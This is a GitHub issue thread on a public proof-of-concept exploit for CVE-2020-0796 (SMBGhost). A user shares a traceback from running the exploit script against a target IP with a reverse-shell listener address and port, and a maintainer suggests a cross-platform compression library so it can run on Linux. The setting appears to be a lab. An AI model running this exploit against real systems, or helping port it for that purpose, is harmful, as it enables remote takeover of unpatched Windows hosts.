CVE-2020-0796-RCE-POC icon indicating copy to clipboard operation
CVE-2020-0796-RCE-POC copied to clipboard
verified publisher icon jamf

AttributeError: module 'ctypes' has no attribute 'windll'

Open raymondyeo88 opened this issue 5 years ago • 9 comments

Hi,

i have received this error message after executed the SMBleedingGhost.py script and the output of the error message is:

root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.131 192.168.75.129 4444 CVE-2020-0796 Remote Code Execution POC (c) 2020 ZecOps, Inc.

Traceback (most recent call last): File "SMBleedingGhost.py", line 909, in exploit(target_ip, reverse_shell_ip, int(reverse_shell_port)) File "SMBleedingGhost.py", line 854, in exploit allocation_pool_object_ptr = leak_allocation_pool_object_ptr(ip_address) File "SMBleedingGhost.py", line 522, in leak_allocation_pool_object_ptr address = leak_ptr(ip_address, ptr_offset, ptr_list) File "SMBleedingGhost.py", line 480, in leak_ptr byte_value = leak_ptr_byte(ip_address, ptr_offset + byte_index, ptr_list) File "SMBleedingGhost.py", line 454, in leak_ptr_byte if leak_if_ptr_byte_larger_than_value(ip_address, byte_offset, ptr_list, mid): File "SMBleedingGhost.py", line 414, in leak_if_ptr_byte_larger_than_value data = b'B'*offset + compress(payload) File "SMBleedingGhost.py", line 272, in compress RtlCompressBuffer = ctypes.windll.ntdll.RtlCompressBuffer AttributeError: module 'ctypes' has no attribute 'windll' root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#

Please help and i would appreciate the assistance. =)

raymondyeo88 avatar Jun 14 '20 08:06 raymondyeo88

The script is designed to run on Windows due to the way the compress function is implemented: https://github.com/ZecOps/CVE-2020-0796-RCE-POC/blob/b9d4bfd8d820feaa60b9bc41ac059482e6f8bdb1/SMBleedingGhost.py#L256-L292

You can try replacing it with a cross platform implementation, such as this one: https://github.com/you0708/lznt1

Michael-ZecOps avatar Jun 14 '20 11:06 Michael-ZecOps

Hi,

Thank you for the swift response. Does it means to say that i need to install python on a Windows 10 machine and run the script on a Windows 10 machine ? Just to clarify.

raymondyeo88 avatar Jun 14 '20 12:06 raymondyeo88

Yes, that's one way. Another way is to use an alternative implementation of the compression which doesn't depend on Windows API.

Michael-ZecOps avatar Jun 14 '20 12:06 Michael-ZecOps

Noted and i will also try out the alternative implementation of the compression as stated above.

You are awesome =)

raymondyeo88 avatar Jun 14 '20 12:06 raymondyeo88

wish there was a version that would run on linux like kali.

Darkcast avatar Sep 29 '20 19:09 Darkcast

Oh no! Only use in windows?

coding-today avatar May 07 '22 08:05 coding-today

i have a question i am getting an error (module 'ctypes' has no attribute 'windll' ) on colab when i am import pyditectinput can you help me out on this. Does this has anything to do with a VM

naffa339434 avatar Jun 19 '22 08:06 naffa339434

have you found any alternative implementation to use with Ubuntu? could you please suggest if any come across?

aravindsunkarNTTData avatar Nov 10 '22 21:11 aravindsunkarNTTData

i have a question i am getting an error (module 'ctypes' has no attribute 'windll' ) on colab when i am import pyditectinput can you help me out on this. Does this has anything to do with a VM

have you resolved this as i have run into the same error?

ereshmittal avatar Apr 09 '23 14:04 ereshmittal